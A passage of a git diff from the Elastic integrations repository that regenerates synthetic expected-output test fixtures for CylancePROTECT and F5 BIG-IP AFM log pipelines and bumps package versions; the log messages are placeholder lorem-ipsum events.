CylancePROTECT tlaboru aeabillo [ciad] Event Type: ugiatqu, Event Name: threat_found, Device Names: (turveli), Policy Name: isciv, User: natus boreet (luptasnu)", "event": { - "ingested": "2021-06-09T10:27:47.526097800Z" + "ingested": "2021-12-14T14:42:47.135090401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edqu 2019-9-19T1:09:05.tationu gnaaliq5240.api.test CylancePROTECT nula ameaquei [gnama] Event Type: esciun, Event Name: pechange, Threat Class: ratvo, Threat Subclass: ntutl, SHA256: volupt, MD5: ine", "event": { - "ingested": "2021-06-09T10:27:47.526102500Z" + "ingested": "2021-12-14T14:42:47.135090782Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-Oct-2019 8:11:40 low ditaut33.mail.localhost iumdo \u003c\u003coreeu\u003emea 3T20:11:40.ssec illum2625.test CylancePROTECT Event Name:LoginSuccess, Threat Class:iaeconse, Threat Subclass:uisa, SHA256:nimadmin, MD5:tdolo", "event": { - "ingested": "2021-06-09T10:27:47.526107100Z" + "ingested": "2021-12-14T14:42:47.135091171Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "18-October-2019 03:14:14 high porissus1225.www5.corp ddoe \u003c\u003cuptateve\u003eured 2019-10-18T3:14:14.ctetu oreeu6419.www.corp CylancePROTECT cul iinea snos Event Type: AuditLog, Event Name: PolicyAdd, Message: Device: moenimip; User: uames tium (ianonn)", "event": { - "ingested": "2021-06-09T10:27:47.526111700Z" + "ingested": "2021-12-14T14:42:47.135091564Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-11-1T10:16:48.tiset sci333.mail.home CylancePROTECT doloreeu lors eumfu Event Type: docons, Event Name: PolicyAdd, Device Names: (eumf), Policy Name: roquisq, User: uasi maveniam (uis)", "event": { - "ingested": "2021-06-09T10:27:47.526116100Z" + "ingested": "2021-12-14T14:42:47.135091953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "imi 2019-11-15T5:19:22.animi edutpers6452.api.host CylancePROTECT ntiumt sumquia vento Event Type: sitv, Event Name: LoginSuccess, Threat Class: com, Threat Subclass: rep, SHA256: mveni, MD5: aquae", "event": { - "ingested": "2021-06-09T10:27:47.526120900Z" + "ingested": "2021-12-14T14:42:47.135092410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "30-November-2019 00:21:57 low iaturE3103.api.domain aturve \u003c\u003cptateve\u003eiatu 2019/11/30T00:21:57.use nulamc5617.mail.host CylancePROTECT teturad ese [eddoei] Event Type: AppControl, Event Name: SystemSecurity, Device Name: ntu, IP Address: (10.134.137.205), Action: deny, Action Type: duntut, File Path: emporin, SHA256: oreseosq, Zone Names: etquasia", "event": { - "ingested": "2021-06-09T10:27:47.526125500Z" + "ingested": "2021-12-14T14:42:47.135092796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-12-14T7:24:31.cinge tatem4713.internal.host CylancePROTECT elites pariat [nimip] Event Type: AuditLog, Event Name: threat_found, Message: Zone: usci; Policy: unturmag; Value: dexeaco, User: lupta ura (oreeufug)", "event": { - "ingested": "2021-06-09T10:27:47.526130400Z" + "ingested": "2021-12-14T14:42:47.135093203Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cylance/manifest.yml b/packages/cylance/manifest.yml index bbaaa58bfca..b990439b3e1 100644 --- a/packages/cylance/manifest.yml +++ b/packages/cylance/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cylance title: CylanceProtect Logs -version: 0.6.0 +version: 0.6.1 description: Collect logs from CylanceProtect devices with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/f5/changelog.yml b/packages/f5/changelog.yml index 9c93b228f3a..13198a4c5bc 100644 --- a/packages/f5/changelog.yml +++ b/packages/f5/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.7.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json b/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json index cbe228732ff..56ea4c285d7 100644 --- a/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/f5/data_stream/bigipafm/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "iusm modtempo olab6078.home olaboris tur itv [F5@odoco acl_policy_name=ria acl_policy_type=min acl_rule_name=ite action=Closed hostname=tatemac3541.api.corp bigip_mgmt_ip=10.228.193.207 context_name=liqua context_type=ciade date_time=Jan 29 2016 06:09:59 dest_ip=10.125.114.51 dst_geo=umq dest_port=2288 device_product=pexe device_vendor=nes device_version=1.2262 drop_reason=reveri errdefs_msgno=boNemoe errdefs_msg_name=equepor flow_id=eni ip_protocol=ipv6 severity=low partition_name=ehend route_domain=ritquiin sa_translation_pool=umqui sa_translation_type=reeufugi source_ip=10.208.121.85 src_geo=sperna source_port=884 source_user=billoi translated_dest_ip=10.165.201.71 translated_dest_port=6153 translated_ip_protocol=tatemU translated_route_domain=deF translated_source_ip=10.11.196.142 translated_source_port=5222 translated_vlan=iatnu vlan=3810", "event": { - "ingested": "2021-06-09T10:31:51.965162300Z" + "ingested": "2021-12-14T14:42:50.150073469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eporr quipexe alo4540.example umdo itessequ vol [F5@luptat acl_policy_name=isiutal acl_policy_type=moenimi acl_rule_name=mod action=Established hostname=enatus2114.mail.home bigip_mgmt_ip=10.51.132.10 context_name=utper context_type=squame date_time=Feb 12 2016 13:12:33 dest_ip=10.173.116.41 dst_geo=iin dest_port=6287 device_product=emape device_vendor=aer device_version=1.445 drop_reason=nse errdefs_msgno=eumiu errdefs_msg_name=uame flow_id=quis ip_protocol=tcp severity=medium partition_name=cca route_domain=dolo sa_translation_pool=meumfug sa_translation_type=tetu source_ip=10.162.9.235 src_geo=tionulam source_port=2548 source_user=byC translated_dest_ip=10.94.67.230 translated_dest_port=783 translated_ip_protocol=atio translated_route_domain=uipexea translated_source_ip=10.92.202.200 translated_source_port=6772 translated_vlan=eFini vlan=859", "event": { - "ingested": "2021-06-09T10:31:51.965186700Z" + "ingested": "2021-12-14T14:42:50.150076237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "exe iatu ionofde2424.api.invalid rsitam ommodic mipsu [F5@consec acl_policy_name=taliquip acl_policy_type=psumq acl_rule_name=atcup action=Reject hostname=gelit6728.api.invalid bigip_mgmt_ip=10.122.116.161 context_name=uam context_type=untutl date_time=Feb 26 2016 20:15:08 dest_ip=10.40.68.117 dst_geo=uptassi dest_port=3179 device_product=scivel device_vendor=aqui device_version=1.4726 drop_reason=iveli errdefs_msgno=llumd errdefs_msg_name=enatuse flow_id=magn ip_protocol=icmp severity=low partition_name=eos route_domain=enimad sa_translation_pool=rmagni sa_translation_type=sit source_ip=10.209.155.149 src_geo=tenima source_port=1073 source_user=seq translated_dest_ip=10.82.56.117 translated_dest_port=2935 translated_ip_protocol=veleumi translated_route_domain=tia translated_source_ip=10.191.68.244 translated_source_port=6905 translated_vlan=veri vlan=5990", "event": { - "ingested": "2021-06-09T10:31:51.965194200Z" + "ingested": "2021-12-14T14:42:50.150076741Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "siutaliq exercit tempor4496.www.localdomain eip lupta iusmodt [F5@doloreeu acl_policy_name=pori acl_policy_type=occ acl_rule_name=ect action=Accept hostname=uid545.www5.localhost bigip_mgmt_ip=10.12.44.169 context_name=autfu context_type=natura date_time=Mar 12 2016 03:17:42 dest_ip=10.163.217.10 dst_geo=untNequ dest_port=5075 device_product=nimadmin device_vendor=erep device_version=1.2696 drop_reason=temq errdefs_msgno=ugiatqu errdefs_msg_name=eacomm flow_id=Utenimad ip_protocol=igmp severity=high partition_name=ehend route_domain=ueipsaqu sa_translation_pool=uidolore sa_translation_type=niamqu source_ip=10.202.66.28 src_geo=tevelit source_port=5098 source_user=elits translated_dest_ip=10.131.233.27 translated_dest_port=5037 translated_ip_protocol=ari translated_route_domain=eataevit translated_source_ip=10.50.112.141 translated_source_port=7303 translated_vlan=dmi vlan=499", "event": { - "ingested": "2021-06-09T10:31:51.965202700Z" + "ingested": "2021-12-14T14:42:50.150077132Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mquisnos loremagn iciade3433.example enimad incididu eci [F5@aali acl_policy_name=ametcons acl_policy_type=porainc acl_rule_name=amquisno action=Established hostname=emquiavo452.internal.localhost bigip_mgmt_ip=10.151.111.38 context_name=tvol context_type=moll date_time=Mar 26 2016 10:20:16 dest_ip=10.228.149.225 dst_geo=ema dest_port=5969 device_product=tquovol device_vendor=ntsuntin device_version=1.3341 drop_reason=tatno errdefs_msgno=imav errdefs_msg_name=ididu flow_id=ciunt ip_protocol=ipv6-icmp severity=very-high partition_name=emqu route_domain=lit sa_translation_pool=iam sa_translation_type=qua source_ip=10.159.182.171 src_geo=umdolore source_port=6680 source_user=mol translated_dest_ip=10.96.35.212 translated_dest_port=3982 translated_ip_protocol=rumet translated_route_domain=oll translated_source_ip=10.206.197.113 translated_source_port=4075 translated_vlan=temUten vlan=4125", "event": { - "ingested": "2021-06-09T10:31:51.965209500Z" + "ingested": "2021-12-14T14:42:50.150077545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iqu ollit usan6343.www5.domain olo uaera sitas [F5@ehenderi acl_policy_name=pidatat acl_policy_type=gni acl_rule_name=tquiinea action=Drop hostname=sun1403.www.invalid bigip_mgmt_ip=10.126.177.162 context_name=eriame context_type=lorema date_time=Apr 09 2016 17:22:51 dest_ip=10.213.82.64 dst_geo=rnatura dest_port=3007 device_product=ddoeiu device_vendor=enb device_version=1.6179 drop_reason=onse errdefs_msgno=liq errdefs_msg_name=metcon flow_id=smo ip_protocol=igmp severity=medium partition_name=emporinc route_domain=untutlab sa_translation_pool=tem sa_translation_type=ons source_ip=10.213.113.28 src_geo=ali source_port=6446 source_user=ist translated_dest_ip=10.169.144.147 translated_dest_port=2399 translated_ip_protocol=nibus translated_route_domain=edquiano translated_source_ip=10.89.163.114 translated_source_port=5166 translated_vlan=par vlan=686", "event": { - "ingested": "2021-06-09T10:31:51.965215100Z" + "ingested": "2021-12-14T14:42:50.150077956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rveli rsint omm4276.www.example onofd taed lup [F5@remeumf acl_policy_name=antiumto acl_policy_type=strude acl_rule_name=ctetura action=Closed hostname=ittenbyC7838.api.localdomain bigip_mgmt_ip=10.18.124.28 context_name=ido context_type=paqu date_time=Apr 24 2016 00:25:25 dest_ip=10.158.194.3 dst_geo=qua dest_port=2945 device_product=quip device_vendor=oin device_version=1.6316 drop_reason=elaudant errdefs_msgno=tinvol errdefs_msg_name=dolore flow_id=abor ip_protocol=udp severity=medium partition_name=etc route_domain=etM sa_translation_pool=nimadmin sa_translation_type=ditautfu source_ip=10.146.88.52 src_geo=entsu source_port=5364 source_user=rudexerc translated_dest_ip=10.101.223.43 translated_dest_port=6494 translated_ip_protocol=quam translated_route_domain=adm translated_source_ip=10.103.107.47 translated_source_port=6094 translated_vlan=Nemoen vlan=2827", "event": { - "ingested": "2021-06-09T10:31:51.965221Z" + "ingested": "2021-12-14T14:42:50.150078353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "icab mwr fugi4637.www.lan imadmini ntutla equa [F5@mexercit acl_policy_name=dtem acl_policy_type=tasuntex acl_rule_name=sunt action=Reject hostname=ume465.corp bigip_mgmt_ip=10.189.109.245 context_name=emaperi context_type=tame date_time=May 08 2016 07:27:59 dest_ip=10.83.234.60 dst_geo=ivelits dest_port=712 device_product=iusmodt device_vendor=etdolo device_version=1.3768 drop_reason=lorumw errdefs_msgno=ommod errdefs_msg_name=sequatur flow_id=uidolo ip_protocol=ipv6-icmp severity=high partition_name=nihi route_domain=Lor sa_translation_pool=itecto sa_translation_type=erc source_ip=10.69.57.206 src_geo=olupt source_port=5979 source_user=onse translated_dest_ip=10.110.99.17 translated_dest_port=6888 translated_ip_protocol=ostrume translated_route_domain=molest translated_source_ip=10.150.220.75 translated_source_port=1298 translated_vlan=tisetq vlan=5372", "event": { - "ingested": "2021-06-09T10:31:51.965226Z" + "ingested": "2021-12-14T14:42:50.150078749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ici giatquov eritquii3561.www.example taut oreseos uames [F5@tati acl_policy_name=utaliqu acl_policy_type=oriosamn acl_rule_name=deFinibu action=Drop hostname=iciatisu1463.www5.localdomain bigip_mgmt_ip=10.153.136.222 context_name=tem context_type=est date_time=May 22 2016 14:30:33 dest_ip=10.176.205.96 dst_geo=nidolo dest_port=3409 device_product=taliq device_vendor=intoccae device_version=1.2299 drop_reason=dolo errdefs_msgno=Loremip errdefs_msg_name=idolor flow_id=emeumfu ip_protocol=ipv6-icmp severity=very-high partition_name=lupt route_domain=psaquae sa_translation_pool=oinBCSe sa_translation_type=mnisist source_ip=10.199.34.241 src_geo=amvolup source_port=7700 source_user=temveleu translated_dest_ip=10.19.194.101 translated_dest_port=3605 translated_ip_protocol=numqu translated_route_domain=qui translated_source_ip=10.121.219.204 translated_source_port=3496 translated_vlan=utali vlan=3611", "event": { - "ingested": "2021-06-09T10:31:51.965231Z" + "ingested": "2021-12-14T14:42:50.150079142Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reetd lumqui itinvo7084.mail.corp equep iavolu den [F5@tutla acl_policy_name=olorema acl_policy_type=iades acl_rule_name=siarchi action=Reject hostname=aliqu6801.api.localdomain bigip_mgmt_ip=10.46.27.57 context_name=ihilm context_type=atDu date_time=Jun 05 2016 21:33:08 dest_ip=10.128.232.208 dst_geo=usmodt dest_port=1837 device_product=run device_vendor=mque device_version=1.4138 drop_reason=quirat errdefs_msgno=llu errdefs_msg_name=licab flow_id=eirure ip_protocol=rdp severity=medium partition_name=oidentsu route_domain=atiset sa_translation_pool=atu sa_translation_type=umexerci source_ip=10.64.141.105 src_geo=iadese source_port=2374 source_user=ice translated_dest_ip=10.57.103.192 translated_dest_port=2716 translated_ip_protocol=oei translated_route_domain=tlabori translated_source_ip=10.182.199.231 translated_source_port=1426 translated_vlan=data vlan=4478", "event": { - "ingested": "2021-06-09T10:31:51.965236400Z" + "ingested": "2021-12-14T14:42:50.150079551Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nnum eritqu uradip7152.www5.home luptasn hitect dol [F5@leumiu acl_policy_name=namali acl_policy_type=taevit acl_rule_name=rinrepre action=Closed hostname=itame189.domain bigip_mgmt_ip=10.32.67.231 context_name=estia context_type=eaq date_time=Jun 20 2016 04:35:42 dest_ip=10.66.80.221 dst_geo=serunt dest_port=7865 device_product=texp device_vendor=tMalor device_version=1.7410 drop_reason=emoe errdefs_msgno=eaq errdefs_msg_name=amest flow_id=corp ip_protocol=tcp severity=low partition_name=rehender route_domain=iae sa_translation_pool=dantiumt sa_translation_type=luptasn source_ip=10.164.6.207 src_geo=olestiae source_port=5485 source_user=pic translated_dest_ip=10.160.210.31 translated_dest_port=7741 translated_ip_protocol=duntut translated_route_domain=magni translated_source_ip=10.3.134.237 translated_source_port=3156 translated_vlan=radipisc vlan=7020", "event": { - "ingested": "2021-06-09T10:31:51.965244Z" + "ingested": "2021-12-14T14:42:50.150079950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fficiade uscipit vitaedi1318.corp temqu edol colab [F5@ommodico acl_policy_name=quatD acl_policy_type=mcolab acl_rule_name=neav action=Established hostname=tsedqu2456.www5.invalid bigip_mgmt_ip=10.182.178.217 context_name=tlab context_type=volupt date_time=Jul 04 2016 11:38:16 dest_ip=10.188.169.107 dst_geo=beata dest_port=6448 device_product=fdeFi device_vendor=texp device_version=1.3545 drop_reason=etdol errdefs_msgno=uela errdefs_msg_name=boN flow_id=eprehend ip_protocol=tcp severity=medium partition_name=aboN route_domain=ihilmo sa_translation_pool=radi sa_translation_type=gel source_ip=10.235.101.253 src_geo=veniam source_port=2400 source_user=giatnu translated_dest_ip=10.42.138.192 translated_dest_port=3403 translated_ip_protocol=quioffi translated_route_domain=uptate translated_source_ip=10.201.6.10 translated_source_port=6608 translated_vlan=sequa vlan=2851", "event": { - "ingested": "2021-06-09T10:31:51.965249Z" + "ingested": "2021-12-14T14:42:50.150080511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ate aliquam nimid893.mail.corp umwr oluptate issus [F5@osamn acl_policy_name=isnisiu acl_policy_type=bore acl_rule_name=tsu action=Closed hostname=stlabo1228.mail.host bigip_mgmt_ip=10.151.161.70 context_name=edo context_type=asia date_time=Jul 18 2016 18:40:50 dest_ip=10.108.167.93 dst_geo=enderit dest_port=5858 device_product=essecil device_vendor=citation device_version=1.3795 drop_reason=eco errdefs_msgno=Utenimad errdefs_msg_name=orpor flow_id=tlabo ip_protocol=rdp severity=low partition_name=emvel route_domain=tmollita sa_translation_pool=fde sa_translation_type=nsecte source_ip=10.22.102.198 src_geo=eroi source_port=176 source_user=nse translated_dest_ip=10.194.247.171 translated_dest_port=4940 translated_ip_protocol=mquisnos translated_route_domain=maven translated_source_ip=10.86.101.235 translated_source_port=3266 translated_vlan=lapar vlan=1024", "event": { - "ingested": "2021-06-09T10:31:51.965254Z" + "ingested": "2021-12-14T14:42:50.150081568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tfu udan orema6040.api.corp mveleu nofdeFin sequam [F5@temvel acl_policy_name=ris acl_policy_type=nisi acl_rule_name=dant action=Reject hostname=ecte4762.local bigip_mgmt_ip=10.204.35.15 context_name=quidolor context_type=tessec date_time=Aug 02 2016 01:43:25 dest_ip=10.135.160.125 dst_geo=mve dest_port=513 device_product=itatio device_vendor=uta device_version=1.4901 drop_reason=sintoc errdefs_msgno=volupt errdefs_msg_name=siste flow_id=uiinea ip_protocol=icmp severity=low partition_name=volupta route_domain=rcitati sa_translation_pool=eni sa_translation_type=ionevo source_ip=10.174.252.105 src_geo=sperna source_port=5368 source_user=mnisi translated_dest_ip=10.107.168.60 translated_dest_port=2227 translated_ip_protocol=oinBC translated_route_domain=quameius translated_source_ip=10.167.172.155 translated_source_port=3544 translated_vlan=etdo vlan=706", "event": { - "ingested": "2021-06-09T10:31:51.965258900Z" + "ingested": "2021-12-14T14:42:50.150081986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ese isaute ptatemq95.api.host Nequepo ipsumd ntocc [F5@uteirure acl_policy_name=nevo acl_policy_type=ide acl_rule_name=aali action=Drop hostname=smo7167.www.test bigip_mgmt_ip=10.214.249.164 context_name=tco context_type=uae date_time=Aug 16 2016 08:45:59 dest_ip=10.187.20.98 dst_geo=quinesc dest_port=6218 device_product=santiumd device_vendor=turadip device_version=1.3427 drop_reason=niamqui errdefs_msgno=orem errdefs_msg_name=sno flow_id=atno ip_protocol=ipv6-icmp severity=high partition_name=volu route_domain=nonn sa_translation_pool=inventor sa_translation_type=quiavol source_ip=10.99.249.210 src_geo=iatisu source_port=6684 source_user=upta translated_dest_ip=10.182.191.174 translated_dest_port=1759 translated_ip_protocol=adm translated_route_domain=leumiur translated_source_ip=10.81.26.208 translated_source_port=7651 translated_vlan=isc vlan=5933", "event": { - "ingested": "2021-06-09T10:31:51.965264Z" + "ingested": "2021-12-14T14:42:50.150082376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tobea tor qui4499.api.local fugiatn docon etconsec [F5@ios acl_policy_name=evolu acl_policy_type=ersp acl_rule_name=tquov action=Drop hostname=sauteiru4554.api.domain bigip_mgmt_ip=10.220.5.143 context_name=com context_type=tnulapa date_time=Aug 30 2016 15:48:33 dest_ip=10.108.85.148 dst_geo=eriti dest_port=2201 device_product=norum device_vendor=madmi device_version=1.1766 drop_reason=sequatu errdefs_msgno=quameius errdefs_msg_name=nisiuta flow_id=roid ip_protocol=icmp severity=very-high partition_name=eprehen route_domain=entor sa_translation_pool=xeacomm sa_translation_type=nihil source_ip=10.101.226.128 src_geo=rsitv source_port=3087 source_user=porro translated_dest_ip=10.88.101.53 translated_dest_port=2458 translated_ip_protocol=tatemUt translated_route_domain=modtemp translated_source_ip=10.201.238.90 translated_source_port=2715 translated_vlan=remag vlan=3759", "event": { - "ingested": "2021-06-09T10:31:51.965268700Z" + "ingested": "2021-12-14T14:42:50.150082767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccaecat tquiin tse4198.www.localdomain ptasn taedicta itam [F5@str acl_policy_name=idolore acl_policy_type=pid acl_rule_name=illoin action=Reject hostname=untut4046.internal.domain bigip_mgmt_ip=10.217.150.196 context_name=uine context_type=udant date_time=Sep 13 2016 22:51:07 dest_ip=10.183.59.41 dst_geo=untu dest_port=5676 device_product=ven device_vendor=con device_version=1.7491 drop_reason=amnih errdefs_msgno=ium errdefs_msg_name=esciuntN flow_id=idunt ip_protocol=udp severity=low partition_name=rQu route_domain=oremeu sa_translation_pool=laudant sa_translation_type=isnost source_ip=10.157.18.252 src_geo=itess source_port=52 source_user=evit translated_dest_ip=10.30.133.66 translated_dest_port=1921 translated_ip_protocol=velitse translated_route_domain=oditem translated_source_ip=10.243.218.215 translated_source_port=662 translated_vlan=rsitvolu vlan=3751", "event": { - "ingested": "2021-06-09T10:31:51.965273600Z" + "ingested": "2021-12-14T14:42:50.150083392Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sumdolor meaqueip npr4414.api.localdomain boNem ess ipisci [F5@gitsed acl_policy_name=tqu acl_policy_type=reprehen acl_rule_name=trumexer action=Accept hostname=quid3147.mail.home bigip_mgmt_ip=10.66.181.6 context_name=epre context_type=tobeata date_time=Sep 28 2016 05:53:42 dest_ip=10.181.53.249 dst_geo=iduntu dest_port=1655 device_product=temUt device_vendor=avol device_version=1.752 drop_reason=essequam errdefs_msgno=acommo errdefs_msg_name=nturma flow_id=str ip_protocol=ipv6 severity=high partition_name=etur route_domain=itecto sa_translation_pool=reetdol sa_translation_type=totamre source_ip=10.148.161.250 src_geo=ciadeser source_port=6135 source_user=adipisc translated_dest_ip=10.181.133.187 translated_dest_port=1079 translated_ip_protocol=aquioffi translated_route_domain=tamet translated_source_ip=10.167.227.44 translated_source_port=6595 translated_vlan=eFi vlan=6733", "event": { - "ingested": "2021-06-09T10:31:51.965278300Z" + "ingested": "2021-12-14T14:42:50.150083795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "its ender riamea1540.www.host seq tutlab sau [F5@atevelit acl_policy_name=meius acl_policy_type=billo acl_rule_name=labo action=Reject hostname=umdolo1029.mail.localhost bigip_mgmt_ip=10.54.17.32 context_name=orumSe context_type=ratv date_time=Oct 12 2016 12:56:16 dest_ip=10.119.81.180 dst_geo=psaquaea dest_port=1348 device_product=nts device_vendor=siut device_version=1.5663 drop_reason=ano errdefs_msgno=piscinge errdefs_msg_name=tvol flow_id=velitess ip_protocol=ipv6 severity=high partition_name=uunturm route_domain=temUte sa_translation_pool=sit sa_translation_type=olab source_ip=10.84.163.178 src_geo=ima source_port=2031 source_user=mquisno translated_dest_ip=10.107.9.163 translated_dest_port=5433 translated_ip_protocol=eacommod translated_route_domain=ctetura translated_source_ip=10.74.11.43 translated_source_port=55 translated_vlan=seosqui vlan=6797", "event": { - "ingested": "2021-06-09T10:31:51.965282900Z" + "ingested": "2021-12-14T14:42:50.150084185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uradi tot llamco7206.www.home oremagna ncididun umSe [F5@xeacomm acl_policy_name=cinge acl_policy_type=itla acl_rule_name=iamquis action=Accept hostname=lorsita2019.internal.home bigip_mgmt_ip=10.192.229.221 context_name=ect context_type=modocons date_time=Oct 26 2016 19:58:50 dest_ip=10.199.194.188 dst_geo=odoconse dest_port=228 device_product=quatu device_vendor=veli device_version=1.5726 drop_reason=nonp errdefs_msgno=labo errdefs_msg_name=ulapar flow_id=aboreetd ip_protocol=igmp severity=low partition_name=llitanim route_domain=invo sa_translation_pool=hit sa_translation_type=urv source_ip=10.112.32.213 src_geo=runtmol source_port=1749 source_user=odi translated_dest_ip=10.184.73.211 translated_dest_port=6540 translated_ip_protocol=esseci translated_route_domain=tametcon translated_source_ip=10.230.129.252 translated_source_port=3947 translated_vlan=isis vlan=4917", "event": { - "ingested": "2021-06-09T10:31:51.965287800Z" + "ingested": "2021-12-14T14:42:50.150084590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utlab emUteni rum959.host velillu cteturad bor [F5@rauto acl_policy_name=ationev acl_policy_type=umdolor acl_rule_name=uaUten action=Reject hostname=paquioff624.mail.invalid bigip_mgmt_ip=10.161.148.64 context_name=ibusBon context_type=ven date_time=Nov 10 2016 03:01:24 dest_ip=10.162.114.217 dst_geo=doloreme dest_port=60 device_product=onemulla device_vendor=evitaed device_version=1.1721 drop_reason=suntin errdefs_msgno=itse errdefs_msg_name=umexerc flow_id=oremipsu ip_protocol=ipv6-icmp severity=medium partition_name=amco route_domain=ssecillu sa_translation_pool=liqua sa_translation_type=olo source_ip=10.199.216.143 src_geo=fdeF source_port=593 source_user=ccaeca translated_dest_ip=10.198.213.189 translated_dest_port=5024 translated_ip_protocol=remagn translated_route_domain=mquae translated_source_ip=10.7.200.140 translated_source_port=3298 translated_vlan=olupt vlan=2189", "event": { - "ingested": "2021-06-09T10:31:51.965292900Z" + "ingested": "2021-12-14T14:42:50.150085014Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edquiac urerepr eseru4234.mail.example qua rsita ate [F5@ipsamvo acl_policy_name=onula acl_policy_type=miu acl_rule_name=rationev action=Reject hostname=mex2054.mail.corp bigip_mgmt_ip=10.65.232.27 context_name=ica context_type=lillum date_time=Nov 24 2016 10:03:59 dest_ip=10.199.40.38 dst_geo=taedicta dest_port=3409 device_product=poriss device_vendor=tvolup device_version=1.1000 drop_reason=siu errdefs_msgno=snost errdefs_msg_name=tpersp flow_id=llamc ip_protocol=tcp severity=very-high partition_name=mvel route_domain=nof sa_translation_pool=usmodi sa_translation_type=mvolu source_ip=10.206.96.56 src_geo=aincidu source_port=2687 source_user=uaeab translated_dest_ip=10.128.157.27 translated_dest_port=1493 translated_ip_protocol=etdolor translated_route_domain=lupta translated_source_ip=10.22.187.69 translated_source_port=3590 translated_vlan=oremi vlan=1485", "event": { - "ingested": "2021-06-09T10:31:51.965298300Z" + "ingested": "2021-12-14T14:42:50.150085407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nbyCi tevel usc5760.www5.localdomain cab atisund xea [F5@ites acl_policy_name=isetq acl_policy_type=iutali acl_rule_name=velite action=Closed hostname=avolupt7576.api.corp bigip_mgmt_ip=10.194.210.62 context_name=porincid context_type=atisetqu date_time=Dec 08 2016 17:06:33 dest_ip=10.51.213.42 dst_geo=dipisci dest_port=3449 device_product=ilmol device_vendor=eri device_version=1.3104 drop_reason=ueipsa errdefs_msgno=tae errdefs_msg_name=autodit flow_id=elit ip_protocol=udp severity=high partition_name=plica route_domain=ore sa_translation_pool=quidolor sa_translation_type=inven source_ip=10.71.114.14 src_geo=itsedd source_port=3010 source_user=admin translated_dest_ip=10.68.253.120 translated_dest_port=481 translated_ip_protocol=est translated_route_domain=uptatemU translated_source_ip=10.183.130.225 translated_source_port=5693 translated_vlan=item vlan=2738", "event": { - "ingested": 